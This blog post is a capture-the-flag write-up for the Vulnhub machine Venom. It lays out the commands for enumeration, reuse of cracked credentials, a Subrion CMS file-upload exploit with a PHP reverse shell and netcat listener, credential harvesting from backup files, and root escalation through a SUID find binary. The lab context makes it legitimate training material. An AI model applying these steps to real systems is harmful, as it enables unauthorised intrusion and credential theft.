NepCodeX

Byte Musings: Where Tech Meets Curiosity


Venom Walkthrough – Vulnhub – Writeup

venom walkthrough writeup vulnhub

Welcome to another OSCP like challenge Venom from Vulnhub. This machine requires a bit of enumeration to get the foothold. Otherwise, it’s an easy machine to do. Venom Walkthrough – Vulnhub – Writeup

Link to the machine: https://www.vulnhub.com/entry/venom-1,701/

Walkthrough of Ripper

Identify the target

Firstly, I had to identify the IP address of the target machine that I am going to do challenge of.

fping -aqg 10.0.2.0/24
image 484

Scan open ports

The next step is to check for the open ports on the target machine.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.0.2.37
image 485

Enumerate the results

Here, we have some ports open. Firstly, I decided to take a look at the apache server. Although it has the default page, I found an MD5 hash in the comment.

image 486

So, I pasted the MD5 hash on the crackstation website to get the result ‘hostinger’.

image 487

Up to now, I had no idea about what this is. So, I looked up the internet if I could find anything. Then, I enumerate the SMB server.

enum4linux -a 10.0.2.37
image 488

It looked like he is one of the users in the machine. So, I tried it as the username and password in the FTP server. Luckily, I got access to it.

ftp 10.0.2.37
# username and password as hostinger
ls -al
cd files
ls -al
get hint.txt
image 489

In the FTP server, I got a hint file that I downloaded instantly and exited from the FTP server.

cat hint.txt
image 491

From the screenshot above, we got many pieces of information as follows:

  • There are some base64 encoded messages that I had to decode. This is an easy part.
  • The hostname of the box is venom.box.
  • There is an encoded password that I had to decode.
  • As usual, there are cryptic names hostinger and dora that I still didn’t know of.

So, I started decoding messages.

echo WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= | base64 -d | base64 -d | base64 -d
image 492
echo aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= | base64 -d
image 493

To put all these pieces together, I got the following message.

You need to follow the 'hostinger' on standard vigenere cipher also https://cryptii.com/pipes/vigenere-cipher

After this, I added the hostname to hosts file.

sudo vi /etc/hosts
image 494

The hostname would lead me to a website built on Subrion CMS v4.2.1.

image 495

Upon searching the exploits, I found that there is an authenticated file upload bypass vulnerability for this version.

https://www.exploit-db.com/exploits/49876

Decoding the password

I opened the link that I decoded. Basically, the encoding mechanism required a key. So, I guessed that one of them is the key and another is the username and I was right.

image 496

Using this information, I logged in as the user dora in the CMS.

image 497

Then, I moved on to use the exploit. However, it didn’t work because in the code, the author had used hardcoded values in the headers.

image 498

So, I had two ways to move further. Either I could change the pieces of information in the code or I should find a different way. Since this is a simple file upload vulnerability, I could get the same result doing actions manually. Moreover, there is a link in the comments of the exploit’s file which lead to a github issue.

https://github.com/intelliants/subrion/issues/801

The issue had clear steps to perform the exploits. Hence, I copied a web shell from my kali distro. Then, I changed the ip and port. Lastly, I changed the extension to phar.

cp /usr/share/webshells/php/php-reverse-shell.php shell.phar
image 499

Then, I started listening on the port.

nc -nlvp 4444

Now, I had to upload the shell from the path /panel/uploads and invoke it from the browser.

image 500
image 501

Finally, I got the shell.

image 502
SHELL=/bin/bash script -q /dev/null
export TERM=xterm

Getting user’s privileges

First thing that I do after I get the access is to look for some credentials and look for the users. I got the credentials for the mysql database but that didn’t lead me anywhere.

cat /etc/passwd | grep bash
image 503

However, since I already knew the behaviour of the user hostinger that he reuses the passwords, I could try the same to switch to the users. But there is also a file that had the password.

cd /var/backup.bak
ls -al
cat .backup.txt
image 504
su hostinger
image 505

For the next part, it took me around half a day because I wasn’t looking properly. After a lot of enumeration, I came to the conclusion that the user hostinger isn’t of any use and I had to find some credentials in the CMS files. Luckily, after searching subtly, I found a file in backup directory.

cd /var/www/html/subrion/backup/
ls -al
cat .htaccess
image 506

Then, I could switch to the user nathan.

su nathan
image 507
cd
ls -al
cat user.txt
image 508

Root privilege escalation

Then, I looked into the SUID binaries that the user had access to.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null
image 509

It looked like there is an SUID permission on the find binary. As you can see the command, we can clearly run shell commands using this method.

Reference: https://gtfobins.github.io/gtfobins/find/

find . -exec /bin/bash -p \; -quit
image 510

Ultimately, I got the access to the root.

Conclusion

This machine is a very nice machine to do the challenge. Although I had got a feeling that I had to find the credentials of the user nathan, I didn’t do that. This took up a lot of time of mine. Otherwise, this is machine is quite straightforward. Thanks to the authors, Ayush Bawariya and Avnish Kumar for the machine.



0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments